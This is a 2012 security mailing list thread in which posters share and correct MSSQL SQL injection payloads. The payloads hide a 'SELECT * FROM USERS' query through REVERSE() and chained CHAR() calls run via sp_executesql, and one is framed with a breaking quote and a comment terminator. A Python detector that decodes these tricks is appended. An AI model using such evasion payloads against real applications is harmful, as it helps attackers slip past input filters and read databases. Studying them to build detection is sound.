PaulDotCom mailing list archives
Re: A fun Sql injection trick (MSSQL)
From: Pat <nutjob.ie () gmail com>
Date: Sat, 9 Jun 2012 13:08:14 +1000
Hi Robin,

You are 100pc correct. The script is generating a + after the first =
I will fix this later tonight.

Corrected syntax

--Select * From Users
DECLARE @myvar nchar(50)= CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+ CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ CHAR(83);
exec sp_executesql @myvar

Apologies for the confusion.

Regards,
Pat

On Fri, Jun 8, 2012 at 6:37 PM, Robin Wood <robin () digininja org> wrote:
> On 8 June 2012 03:43, Pat <nutjob.ie () gmail com> wrote:
>> Hi all,
>>
>> I came from a developer background and found myself in business
>> development so in order to get my nerd on I started a blog as I do have
>> the odd brainfart.
>>
>> Thought I'd share one of my favourites as I have seen a few posts out
>> there saying obfuscation of SQL injection is not possible...
>>
>> Example 1
>> --MSSQL
>> --SELECT * FROM USERS;
>> 'DECLARE @myvar nchar(50)= REVERSE(';sresu morf * tceles'); exec sp_executesql @myvar ;--
>>
>> Example 2
>> --MSSQL
>> --SELECT * FROM USERS;
>> DECLARE @myvar nchar(50)= + CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+ CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ CHAR(83);
>> exec sp_executesql @myvar
>
> Is there a rogue + after the = in this example?
>
> Robin
>
>> For a script to generate example 2 see http://stolenpackets.net/?p=11
>>
>> Regards,
>> Pat
>> _______________________________________________
>> Pauldotcom mailing list
>> Pauldotcom () mail pauldotcom com
>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> Main Web Site: http://pauldotcom.com
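Both obfuscations discussed in this thread (REVERSE() of a literal, and a chain of CHAR() calls, each handed to sp_executesql) can be folded back to plain text when reviewing logged request parameters. The following is an added example, not code from the posts or from the linked script; the names `fold_constants` and `is_suspicious` and the keyword list are assumptions chosen for illustration.

```python
import re

# One CHAR(n)/NCHAR(n) call, and a '+'-joined chain of them.
CHAR_CALL = r"N?CHAR\(\s*(\d{1,5})\s*\)"
CHAR_CHAIN = re.compile(CHAR_CALL + r"(?:\s*\+\s*" + CHAR_CALL + r")*", re.I)
# REVERSE('literal') where the literal has no embedded quote.
REVERSE_CALL = re.compile(r"REVERSE\(\s*N?'([^']*)'\s*\)", re.I)
# "@var nchar(50)" or "AS nchar(50)" is a type declaration, not a function call.
TYPE_CONTEXT = re.compile(r"(?:@\w+|\bAS)$", re.I)
DYNAMIC_EXEC = re.compile(r"\b(?:sp_executesql|exec(?:ute)?)\b", re.I)
SQL_KEYWORDS = re.compile(r"\b(?:select|insert|update|delete|drop|union|exec)\b", re.I)


def fold_constants(sql):
    """Return (normalized_sql, decoded_strings) with CHAR()/REVERSE() folded."""
    decoded = []

    def quote(text):
        decoded.append(text)
        return "'" + text.replace("'", "''") + "'"

    def fold_chain(m):
        if TYPE_CONTEXT.search(m.string[:m.start()].rstrip()):
            return m.group(0)  # leave the declared type untouched
        codes = re.findall(CHAR_CALL, m.group(0), re.I)
        return quote("".join(chr(int(c)) for c in codes))

    sql = CHAR_CHAIN.sub(fold_chain, sql)
    sql = REVERSE_CALL.sub(lambda m: quote(m.group(1)[::-1]), sql)
    return sql, decoded


def is_suspicious(sql):
    """True when constants decode to SQL keywords and the input runs dynamic SQL."""
    _, decoded = fold_constants(sql)
    hidden = any(SQL_KEYWORDS.search(text) for text in decoded)
    return hidden and bool(DYNAMIC_EXEC.search(sql))


if __name__ == "__main__":
    # Input taken from Example 1 in the thread, without the leading quote.
    sample = "DECLARE @myvar nchar(50)= REVERSE(';sresu morf * tceles'); exec sp_executesql @myvar"
    print(fold_constants(sample)[0], is_suspicious(sample))
```

Run the check on the normalized text as well as the raw input, since keyword filters that only see the raw parameter are exactly what these two encodings get past.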